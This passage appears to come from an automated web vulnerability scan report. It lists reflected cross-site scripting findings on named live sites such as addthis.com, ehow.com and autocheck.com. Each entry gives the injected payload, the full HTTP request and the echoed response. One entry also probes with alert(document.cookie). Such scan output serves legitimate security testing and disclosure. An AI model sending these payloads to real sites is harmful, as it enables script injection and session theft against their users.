<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-includes/js/jquery/jquery.js9baba\"><script>alert(1)</script>5354db22a2c" />
...[SNIP]...

4.324. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c5"-alert(1)-"0052ce52990 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php7b7c5"-alert(1)-"0052ce52990 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 01 Feb 2011 15:38:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=etee9v0mo7s339efrl5f6v3n43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1497
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php7b7c5"-alert(1)-"0052ce52990";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.325. http://www.addthis.com/bookmark.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a38f0<script>alert(1)</script>9726beaea83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa38f0<script>alert(1)</script>9726beaea83 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 01 Feb 2011 15:38:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=k78r7pgsm4fr4lff7iqm85a8p6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1523
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa38f0<script>alert(1)</script>9726beaea83</strong>
...[SNIP]...

4.326. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da82f\" style=x:expression(alert(1)) 29d0b5c18ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=mc/da82f"%20style%3dx%3aexpression(alert(1))%2029d0b5c18bailus HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="mc/da82f\" style=x:expression(alert(1)) 29d0b5c18bailus" />
...[SNIP]...

4.327. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0096"-alert(1)-"e20af2b4cfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bookmark.php/c0096"-alert(1)-"e20af2b4cfa HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 93980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/c0096"-alert(1)-"e20af2b4cfa";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

4.328. http://www.addthis.com/bookmark.php [username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 was submitted in the username parameter. This input was echoed as be264\" style=x:expression(alert(1)) a7df52ee127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=mcilusbe264"%20style%3dx%3aexpression(alert(1))%20a7df52ee127 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="mcilusbe264\" style=x:expression(alert(1)) a7df52ee127" />
...[SNIP]...

4.329. http://www.addthis.com/bookmark.php [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca was submitted in the v parameter. This input was echoed as 696ca"style="x:expression(alert(1))"f3f01901aca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250696ca"style%3d"x%3aexpression(alert(1))"f3f01901aca&username=mcilus HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250696ca"style="x:expression(alert(1))"f3f01901aca" />
...[SNIP]...

4.330. http://www.astaro.com/newsletter [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/newsletter

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9c4b4<script>alert(1)</script>af757eb65d0 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsletter?uid=90d583b---24cb6%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E78300d896e19c4b4<script>alert(1)</script>af757eb65d0 HTTP/1.1
Host: www.astaro.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __unam=fa38af9-12dddaf19a7-13ff2714-1; k_visit=1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; __utma=112476180.1215039085.1296493738.1296493738.1296504424.2; __utma=1.546991621.1296493738.1296493738.1296493738.1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:57:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 13:57:22 GMT
X-Varnish: 1753531569
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 59170

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>78300d896e19c4b4<script>alert(1)</script>af757eb65d0">
...[SNIP]...

4.331. http://www.autocheck.com/ [siteID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0cf8"%3balert(1)//cf9b759ede9 was submitted in the siteID parameter. This input was echoed as a0cf8";alert(1)//cf9b759ede9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?WT.mc_id=3499&siteID=3499a0cf8"%3balert(1)//cf9b759ede9 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:06 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.119221296661386602; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=cWs7WQE0rZngyYQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:12 GMT
Set-Cookie: JSESSIONID=cWs7WQE0rZngyYQcN3; path=/
Connection: close
Content-Type: text/html
Content-Length: 30580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...

...[SNIP]...

4.332. http://www.autocheck.com/ [siteID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The value of the siteID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3c6"><script>alert(1)</script>713dc893771 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?WT.mc_id=3499&siteID=34996d3c6"><script>alert(1)</script>713dc893771 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:06 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.132231296661386218; path=/; expires=Fri, 04-Mar-11 15:43:06 GMT
Cache-Control: private
P3P: policyref="http://www.autocheck.com/w3c/p3p.xml", CP="NON DSP COR NID TAIa OUR NOR STA"
Cache-Control: private
Set-Cookie: referralCookie=bIZSzpUOcIr54GQcN3; path=/; expires=Fri, 04-Mar-2011 15:43:11 GMT
Set-Cookie: JSESSIONID=bIZSzpUOcIr54GQcN3; path=/
Connection: close
Content-Type: text/html
Content-Length: 30844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1
...[SNIP]...
<a class="main" href="http://usedcars.autocheck.com?WT.mc_id=34996d3c6"><script>alert(1)</script>713dc893771&siteID=34996d3c6">
...[SNIP]...

4.333. http://www.cs.tut.fi/~jkorpela/quirks-mode.html, [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cs.tut.fi
Path:	/~jkorpela/quirks-mode.html,

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e387<script>alert(1)</script>418e066417d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jkorpela5e387<script>alert(1)</script>418e066417d/quirks-mode.html, HTTP/1.1
Host: www.cs.tut.fi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 04:07:36 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 1567

<html><head>
<title>www.cs.tut.fi error message</title>
</head>
<body bgcolor="#d0d0d0">

<p> <font size="-1" color="gray">
This server is <code>www.cs.tut.fi</code>, located at
<a href="http://www
...[SNIP]...
<code>
GET http://www.cs.tut.fi/~jkorpela5e387<script>alert(1)</script>418e066417d/quirks-mode.html, (error code: 404)
</code>
...[SNIP]...

4.334. http://www.cs.tut.fi/~jkorpela/quirks-mode.html, [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cs.tut.fi
Path:	/~jkorpela/quirks-mode.html,

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcabd"><script>alert(1)</script>2e234cdb39e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html, HTTP/1.1
Host: www.cs.tut.fi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 04:07:33 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 1573

<html><head>
<title>www.cs.tut.fi error message</title>
</head>
<body bgcolor="#d0d0d0">

<p> <font size="-1" color="gray">
This server is <code>www.cs.tut.fi</code>, located at
<a href="http://www
...[SNIP]...
<a href="http://www.tut.fi/~jkorpeladcabd"><script>alert(1)</script>2e234cdb39e/quirks-mode.html,">
...[SNIP]...

4.335. http://www.ehow.com/account/simple_login.aspx [afterLogin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The value of the afterLogin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b was submitted in the afterLogin parameter. This input was echoed as 90c4e"style="x:expression(alert(1))"91e1a856a5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /account/simple_login.aspx?afterLogin=90c4e"style%3d"x%3aexpression(alert(1))"91e1a856a5b HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7281

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
<form action="http://www.ehow.com/account/simple_login.aspx?afterLogin=90c4e"style="x:expression(alert(1))"91e1a856a5b" method="post">
...[SNIP]...

4.336. http://www.ehow.com/account/simple_login.aspx [afterLogin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_login.aspx

Issue detail

The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d0d0'%3balert(1)//1fa3188652 was submitted in the afterLogin parameter. This input was echoed as 7d0d0';alert(1)//1fa3188652 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /account/simple_login.aspx?afterLogin=7d0d0'%3balert(1)//1fa3188652 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7241

<!DOCTYPE html>
<html id="www-ehow-com">
   <head>
       <title>Sign in to your eHow Account</title>
       <meta name="siteid" scheme="DMINSTR2" content="EHWC" />
       <meta name="pagetype" scheme="DMINSTR2
...[SNIP]...
   ownerid            : dlabs.user.id,
           cookie            : '',
           session            : 'axi0su55dyp0oq45zse1qr55',
           userid            : dlabs.user.id,
           username        : dlabs.user.name
       };
           var afterLogin = '7d0d0';alert(1)//1fa3188652';

           var unavailable = true;

               unavailable = false;


           if(unavailable) {
               try {
                   parent.window.location = '/unavailable.aspx';
               } catch(error) {
                   try {

...[SNIP]...

4.337. http://www.ehow.com/account/simple_register.aspx [afterLogin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/account/simple_register.aspx

Issue detail

The value of the afterLogin request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff930'%3balert(1)//5c2172634b4 was submitted in the afterLogin parameter. This input was echoed as ff930';alert(1)//5c2172634b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /account/simple_register.aspx?afterLogin=submit_frmMailff930'%3balert(1)//5c2172634b4 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:44:59 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <title>Register fo
...[SNIP]...
labs.user.id,
           cookie            : '',
           session            : 'axi0su55dyp0oq45zse1qr55',
           userid            : dlabs.user.id,
           username        : dlabs.user.name
       };
           var afterLogin = 'submit_frmMailff930';alert(1)//5c2172634b4';

           var unavailable = true;

               unavailable = false;


           if(unavailable) {
               try {
                   parent.window.location = '/unavailable.aspx';
               } catch(error) {
                   try {

...[SNIP]...

4.338. http://www.ehow.com/arts-and-crafts/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-crafts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbed2'-alert(1)-'b6ad201675f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /arts-and-crafts/?dbed2'-alert(1)-'b6ad201675f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.339. http://www.ehow.com/arts-and-entertainment/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/arts-and-entertainment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d59da'-alert(1)-'dafe2f9e7e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /arts-and-entertainment/?d59da'-alert(1)-'dafe2f9e7e8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.340. http://www.ehow.com/beauty-and-personal-care/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/beauty-and-personal-care/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce2c5'-alert(1)-'b84718647fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /beauty-and-personal-care/?ce2c5'-alert(1)-'b84718647fe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.341. http://www.ehow.com/business/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/business/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76bb7'-alert(1)-'d74031893f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /business/?76bb7'-alert(1)-'d74031893f9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75314

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Business - How To Information | eHow.com</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/business/?76bb7'-alert(1)-'d74031893f9=1" ref="like" width="300">
...[SNIP]...

4.342. http://www.ehow.com/car-repair-and-maintenance/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/car-repair-and-maintenance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81bbf'-alert(1)-'0dd7b3504d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /car-repair-and-maintenance/?81bbf'-alert(1)-'0dd7b3504d5=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
